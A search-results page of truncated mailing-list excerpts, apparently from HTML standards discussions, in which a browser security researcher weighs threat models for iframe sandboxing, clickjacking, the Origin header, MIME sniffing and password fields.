It's probably OK to replace the URL of the previous page if it
otherwise doesn't interfere with the ongoing navigation. The old
attacks predated the pushState / replaceStates API altogether.
/mz
On Sun, Nov 2, 2014 at 1:43 PM, cowwoc wrote:
> On 02/11/2014 12:28 PM, Michal Z
> I believe I have a legitimate use-case (described in comment #9) for needing
> to change the URL in "beforeunload".
I am probably at least partly to blame for the browsers not letting
you do that - I reported several onbeforeunload attacks some 8 years
ago. Sorry!:-)
In general, there is a secu
So I might have started this on the wrong foot, but let's consider the
broader threat model. What do we want to protect against?
1) XSS stealing the passwords / CC numbers entered by the user
manually? This is probably not possible with this proposal; the evil
payload may construct a form where th
> Fair enough - although I worry that the likelihood of people using
> this in conjunction with tightly-scoped per-document CSP (versus the
> far more likely scenario of just having a minimal XSS-preventing
> site-wide or app-wide policy that will definitely not mitigate #3 and
> probably do nothin
>> 1) Change the action value for the form to point to evil.com, where
>> evil.com is in attacker's control,
>
> I hope that this is mitigated by the `form-action` CSP directive, which
> allows the site to control the valid endpoints for form submission, and
> `connect-src`, which allows the same f
>
I think that one huge problem with this is that the attacker will have
many other, indirect ways to get the value even if you protect direct
access to the field. Two most obvious options include:
1) Change the action value for the form to point to evil.com, where
evil.com is in attacker's
> I think that's Ian's point, that for those file types, we need CT, but for
> others, like manifest files, and image and plugins we shouldn't need.
If we take this route, I think we'd be essentially making sure that
many web applications that are safe today will gradually acquire new
security bug
> I disagree. Much of the Web actually relies on this today, and for the
> most part it works. For example, when you do:
>
>
>
> ...the Content-Type is ignored except for SVG.
Well, is actually a fairly special case of content that is
difficult for attackers to spoof and that can't be easily
> We probably can't support a well-defined algorithm for detecting
> documents that have distinctive signatures while safely supporting
> formats that don't have them (because there is always a possibility
> that the non-structured format with user-controlled data could be used
> to forge a signatu
>> Yup, from the perspective of a significant proportion of modern
>> websites, MIME sniffing would be almost certainly a disaster.
>
> I'm not suggesting sniffing, I'm suggesting having a single well-defined
> algorithm with well-defined fixed signatures.
>
> For formats that don't have signatures
Two implementation risks to keep in mind:
1) Both jar: and mhtml: (which work or worked in a very similar way)
have caused problems in absence of strict Content-Type matching. In
essence, it is relatively easy for something like a valid
user-supplied text document or an image to be also a valid ar
> This is about how the Web works, not browser UIs. If I click a link on
> www.computerviruses.com, and it prompts me to save a file to disk, I make my
> decision of what to do with the file based on the context of the link I
> clicked.
In my experience, the web is a lot more complicated than tha
> Downloads are associated with the site the link is on, not the domain the
> resource is served from. If users click a download link and the file comes
> from s3.amazonaws.com, they didn't come from Amazon; they came from your
> page.
I don't believe that's the case in most browser UIs. In fact,
I think I raised this on several other threads; in essence, countless
websites permit users to upload constrained file formats, such as
JPEGs or GIFs used as profile images. With content sniffing attacks,
we've already seen that it's relatively trivial for attacker to make
files that are both valid
There are substantial negative security consequences to sniffing
content on MIME types that are commonly used as default fallback
values by web servers or web application developers. This includes
text/plain and application/octet-stream.
/mz
> Any feedback on this revised approach?
My vague concern is that the separation is a bit fuzzy, beyond saying
that window.opener will be null... if that's the only guaranteed
outcome, then maybe that should be spelled out more clearly? The
degree of separation between browsing contexts is intuiti
Several questions:
1) How would this mechanism work with named windows (which may be targeted
by means other than accessing opener.*)? In certain implementations (e.g.,
Chrome), the separation in this namespace comes free, but that's not given
for other browsers. There are ways in which the attack
> Tab suggests (on IRC) that this should just be tied to sandbox="", which
> seems reasonable at first blush.
Sandbox is opt-in (which means we'd start revealing origins in
existing settings without a warning); and has other serious
constraints which preclude it from some existing use cases (e.g.,
In fact, in the vein of opt-in disclosure perhaps something like
discloselocation={none|origin|full} would be more convenient - in
which case, you get something like
window.parentLocations[n].{origin|href|hash|...}
I constantly fear that origin scoping for security mechanisms is too
coarse-grained
I can think of some fringe scenarios where disclosing parent origins
may be somewhat undesirable. One example may be a "double-bagged"
advertisement, where the intent is to not tell the advertiser about
the top-level page the ad is embedded on (visited site ->
pointing to the ad provider site ->
The security problems with drag-and-drop are significantly more
pronounced than just the banking scenario you are describing. Because
the drag-and-drop action is very similar to other types of legitimate
interaction (e.g., the use of scrollbars), many practical
content-stealing attacks have been de
> It would be nice if this could be done orthogonally to rel="noreferrer", and
> in a way that's link-specific instead of global to the whole page; for
> example, , .
There is a fairly strong security benefit of policing it on document-
or even origin-level: it's exceedingly easy to miss an outgoi
[ Julian Reschke ]
> Observation: javascript: IMHO isn't a URI scheme (it just occupies a place
> in the same lexical space), so maybe the right thing to do is to document it
> as historic exception that only exists in browsers.
In one of its modes, it's roughly equivalent to data:
(javascript:"f
What about javascript: URLs?
Right now, every browser seems to treat javascript:alert('#') in an
"intuitive" manner.
This likely goes beyond data: and javascript:, so I think it would be
useful to look at it more holistically.
/mz
> How about deleting the value if the input type is changed away from the
> secure password input type AND that the secure password can only be
> submitted to a similar URI.
Right now, for interoperability, password managers allow a good amount
of fuzziness when matching forms, and I do not believ
> For the last 10+ years, password inputs have been accessible from scripts,
> with nary a complaint. If I have this code:
Denying access to password fields from JavaScript is actually a
somewhat interesting security enhancement when you consider the
behavior of password managers. Right now, if y
> I don't think the issue raised was about getting people to save files,
> though. If you can get someone to click a link, you can already point
> them at something that sets the HTTP C-D header.
The origin of a download is one of the best / most important
indicators people have right now (which,
> On Linux you may have comprehensive mailcap lists in /etc, or better
> yet the filename extension to MIME type mappings used by httpds.
Which still don't necessarily map to the behavior of every single file
manager; some of them come with their own rules (heck, even mc does
that IIRC), some rely
> Browsers should just use the same behaviour when encountering the function
> in a HTML attribute.
Keep in mind that the mechanism *is* extremely imperfect. It only
works for MIME types and extensions recognized by the browser (which
is a small list). There's a large disconnect between this set,
> At least in the case of Firefox for that particular case on Windows the
> filename will be sanitized...
Yes, but Firefox is an exception, not a rule; and even that mechanism
is very imperfect (it relies on explicit mappings that are not
guaranteed to be in sync with other OS components; when dow
> So, it's not so much the security issue (the browser's job), but an
> appearance-of-fault issue: the site not wanting to be blamed if the
> browser fails at that job.
Well, the browser does the best it can (i.e., documents the origin of
a download), and the user does the best he can (examines th
> Maybe a bit more contriving could come up with a more plausible example.
My concern is a bit more straightforward. To use a practical example:
just because a social networking site allows nearly arbitrary JPEG
files to be uploaded and served as profile pictures (Content-Type:
image/jpeg) does no
Note that somewhat counterintuitively, there would be some security
concerns with markup-level content disposition controls (or any JS
equivalent). For example, consider evil.com doing this:
Downloading files in general is a very problematic area, because
there's a very fragile transition betwee
Hi folks,
The HTML4 spec said that on and tags, Content-Type
overrides type=. All browser vendors implemented a different behavior,
however, where type= almost always overrides Content-Type.
Plugin vendors, in turn, missed that "almost" part, built extensive
security mechanisms, and promoted us
> As suggested above, could a header be required on compliant browsers to send
> a header along with their request indicating the originating server's
> domain?
Yes, but it's generally a bad practice to release new features that
undermine the security of existing systems, and requiring everybody t
> Servers are already free to obtain and mix in content from other sites, so
> why can't client-side HTML JavaScript be similarly empowered?
I can see two reasons:
1) Users may not be happy about the ability for web applications to
implement an unprecedented level of automation through their clie
> Perhaps we want an "allow-frame-busting" directive? In the
> implementation we have an "allow-navigation" bit that covers
> navigation |top| as well as window.open, etc. Maybe we want a more
> general directive that twiddles this bit?
I'm wondering if sites want to have control over the type o
> Can a frame in @sandbox ever navigation the top-level frame? If not,
> that would make it hard to use @sandbox to contain advertisements,
> which want to navigate |top| when the user clicks on the ad.
Ads would want to be able to do that, but user-controlled gadgets
shouldn't. I suppose the top
> Not escaping " is so easily and quickly discovered that I really don't
> think that's a problem.
The same argument could be made for not escaping <, but I don't think
it's valid in practice - particularly for (hypothetically) constrained
input fields.
>> That would be great. I think Adam propos
> The reason to use a MIME type here is to trick legacy browsers into
> not rendering the response as HTML.
Legacy browsers probably will, anyway :-(
/mz
> I've introduced srcdoc="" to largely handle this. There is an example in
> the spec showing how it can be used.
Yup, sounds good.
> This has been proposed before. The concern is that many authors would be
> likely to make mistakes in their selection of "random" tokens that would
> lead to signi
> But this span will have another span as its
> child, sandboxed. The regular parser sees no entities here, only a
> nested span!
That's a pretty reasonable variant for lightweight sandboxes, IMO. It
does not have the explicit assurance of a token-based approach (i.e.,
will not fail
On Sun, Dec 13, 2009 at 2:00 PM, Adam Barth wrote:
> The sandbox tag is great at addressing that use case. I don't see why
> we should delay it in the hopes that the tag comes back to
> life.
And Adam - as you know, I have deep respect for your expertise and
contributions in this area, so plea
> How do I use the tag to sandbox advertisements?
Huh? But that's not the point I am making... I am not arguing that
iframe sandbox should be abandoned as a bad idea - quite the opposite.
I was merely suggesting that we *expand* the same logic, and the same
excellent security control granularity
> That seems like a backwards way of proceeding. Do you have a proposal
> for unification besides the tag?
The only fundamental objection I have heard against it is the trouble
with XML representation.
The other option is to simply require a traditional CDATA-esque
behavior or a tag parameter -
[...sorry for splitting the response...]
> People screw up CSRF tokens all the time. The closing tag nonce
> design has been floating around for years. The earliest variant I
> could find is Brendan's tag.
Sure, I hinted it not as a brilliant new idea, but as a possibilty.
I do think giving i
> The @sandbox seems like a better fit for the advertising use case.
I am not contesting this, to be clear - I am aware of many cases where
it would be very useful - but gadgets are a fairly small part of the
Internet, and seems like a unified solution would be more desirable
than several very dif
> Nah, token-guarding is no good. [...] More importantly, though,
> it puts a significant burden on authors to generate unpredictable
> tokens.
Btw, just to clarify - I am not proposing this instead of the current
method; we could very well allow token-guarded sandboxing on divs /
spans, and sandb
> I believe that the @doc attribute, discussed in the original threads
> about @sandbox, will be introduced to deal with that. It'll take
> plain html as a string, avoiding the opaqueness and larger escaping
> requirements of a data:// url, as the only thing you'll have to escape
> is whichever qu
Hi folks,
So, we were having some internal discussions about the IFRAME sandbox
attribute; Adam Barth suggested it would be more productive to bring
some of the points I was making on the mailing list instead.
I think the attribute is an excellent idea, and close to the dream
design we talked abo
On Tue, 30 Sep 2008, Edward Z. Yang wrote:
In that case, you are certainly correct; adding a salt only hinders an
attacker. But if we're worried about Origin giving away a secret
intranet website, I think things should be reasonable. Of course, they
can still dictionary brute-force it...
I g
On Tue, 30 Sep 2008, Edward Z. Yang wrote:
More importantly, since the dictionary of possible inputs is rather
limited, it would be pretty trivial to build a dictionary of site <->
hash pairs and crack the values. May protect
xyzzy2984.eur.int.example.com, but would still reveal to me you are
co
On Tue, 30 Sep 2008, Adam Barth wrote:
This could be addressed by sending a cryptographic hash of the origin (using
an algorithm that is commonly available in libraries used by server-side
programmers).
Interesting idea. So you're suggesting something like:
Origin-SHA1: 4e13de73de2d1a1c350eb4
On Wed, 1 Oct 2008, Robert O'Callahan wrote:
I don't think that's secure. The outer page can set the IFRAME's URL to
contain a #xyz fragment identifier
That's really covered in the original proposal. Honest :P In a kludgy
manner, of course (permitting fragments, but not permitting onload
scr
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
If I understand correctly, with Michal's option 3, those sites would
also stop working as soon as the user scrolled down in the framed page
(so that the top-left of the framed page is out of view).
Nope, the restriction applies strictly to the top
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
If the chat gadget is configured to only talk to the site owner, how can it
be abused? I suppose the site owner can discover the chat nick of a visitor
who otherwise wouldn't want to disclose it. That's a risk that the chat
system developers might ve
On Tue, 30 Sep 2008, Robert O'Callahan wrote:
We can easily offer these developers the following options:
a) developers of privileged gadgets can whitelist domains that they trust to
not subvert the UI
How is this achieved? If I have a chat ("talk to site owner using your
$foo chat account")
On Mon, 29 Sep 2008, Hallvord R M Steen wrote:
It still completely ignores the question of how we protect gadgets / mashups
/ whatever that are *designed* to be embedded on potentially untrusted
sites, but depend on having the integrity of their UIs preserved
After giving this quite some thoug
On Mon, 29 Sep 2008, Anne van Kesteren wrote:
A cross-site XMLHttpRequest request would always include Origin. I
haven't really seen other specifications start using it yet, but I
believe there are some experimental implementations for including it in
cross-site POST requests.
Yup, I mean t
On Mon, 29 Sep 2008, Hallvord R M Steen wrote:
To give webmasters more ways to deal with this situation, I think we
should implement the Access Control "Origin" HTTP-header only (assuming
that it should refer to the top site in the frameset hierarchy).
I definitely like the "Origin" proposal
On Sun, 28 Sep 2008, Robert O'Callahan wrote:
There is no way in the world that Microsoft would implement your option
3 in a security update to IE6.
Sure, I'm not implying this. I simply have doubts about any other major
security changes making it into MSIE8 or Firefox 3.
Cheers,
/mz
On Sun, 28 Sep 2008, Robert O'Callahan wrote:
I'm not sure what you're talking about here. I'm specifically NOT talking
about Content-Restrictions or Site-Security-Policies or any other policies
for controlling what a page may do once it has loaded.
I'm expressing approval for your option 1,
"
On Sun, 28 Sep 2008, Michal Zalewski wrote:
If you have faith that all these places can be patched up because we
tell them so, and that these who want to would be able to do so
consistently and reliably - look at the current history of XSRF and XSS
vulnerabilities.
...and consequently, the
On Sat, 27 Sep 2008, Jim Jewett wrote:
Yet opt-in proposals expect content authors to immediately add security
checks everywhere, which is considerably less realistic than having a
handful of webpages adjust their behavior, if we indeed break it (which I
don't think would be likely with the
On Sat, 27 Sep 2008, Jim Jewett wrote:
uhm... that is exactly when involuntary actions are *most* likely.
It's not about merely clicking something accidentally - it's about
clicking at a very specific place, as intended by the attacker, to trigger
a very specific functionality on a targeted
On Sat, 27 Sep 2008, Anne van Kesteren wrote:
Could you list these comprehensive designs perhaps?
I mean, proposals to make it possible for sites to opt in for explicitly
controlling various cross-domain interactions now permitted by default
(which includes including scripts, making POST req
On Sat, 27 Sep 2008, Robert O'Callahan wrote:
Default permission of cross-domain loads is responsible for *a lot* of
problems. Allowing sites to escape that would address a lot of problems,
even if it is opt-in. Eventually we could hope to reach a state where
all browsers support it, and most
On Sat, 27 Sep 2008, Smylers wrote:
All this assuming that the inability to interact with a cross-domain
gadget whose top part is off the screen is an usability problem by
itself, to a degree that invalidates any security benefit for such a
scheme. Many of the earlier security improvements withi
On Fri, 26 Sep 2008, Elliotte Rusty Harold wrote:
It's tongue-in-cheek that I don't expect it to be adopted or seriously
considered (this year). It's not tongue-in-cheek in that I very much
wish it were adopted. That is, I think it's in the realm of the
desirable, not the possible.
Oh yup, a
On Fri, 26 Sep 2008, Maciej Stachowiak wrote:
Maybe I didn't read very well, but I don't see how the "clause for UI action
optimizations" would prevent what I described. Could you spell it out for me
please? It seems to me that the embedded iframes for iGoogle gadgets (or
similar) will indeed
On Fri, 26 Sep 2008, Elliotte Harold wrote:
Absolutely false. The media simply needs to be served from the same host
the blog itself is. This is how almost all the media in my blogs works
today. What little content comes from a 3rd party site in my blogs
(mostly from laziness) could easily be
On Thu, 25 Sep 2008, Maciej Stachowiak wrote:
I meant, corner of the container, rather than actual document rendered
within.
Then can't you work around the restriction by scrolling the contents
inside the iframe and sizing it carefully? (One way to scroll an iframe
to a desired position is t
On Fri, 26 Sep 2008, Robert O'Callahan wrote:
Seems like this will create a really bad user experience. The user
scrolling around in the outer document will make IFRAMEs in it
mysteriously become enabled or disabled.
Well, to put this in perspective - we are talking about cross-domain
IFRAME
On Thu, 25 Sep 2008, Maciej Stachowiak wrote:
C) Treat a case where top-left corner of the IFRAME is drawn out of
a visible area (CSS negative margins, etc) as a special case of
being obstructed by the owner of a current rendering rectangle
(another IFRAME or window.top) and carry o
On Thu, 25 Sep 2008, Collin Jackson wrote:
6) New cookie attribute: The "httpOnly" cookie flag allows sites to
put restrictions on how a cookie can be accessed. We could allow a new
flag to be specified in the Set-Cookie header that is designed to
prevent CSRF and "UI redress" attacks. If a cook
Hi folks,
I am posting here on the advice of Ian Hickson; I'm new to the list, so
please forgive me if any of this brings up long-dismissed concepts;
hopefully not.
For a couple of months now, along with a number of my colleagues at
Google, we were investigating a security problem that we fe
76 matches
Mail list logo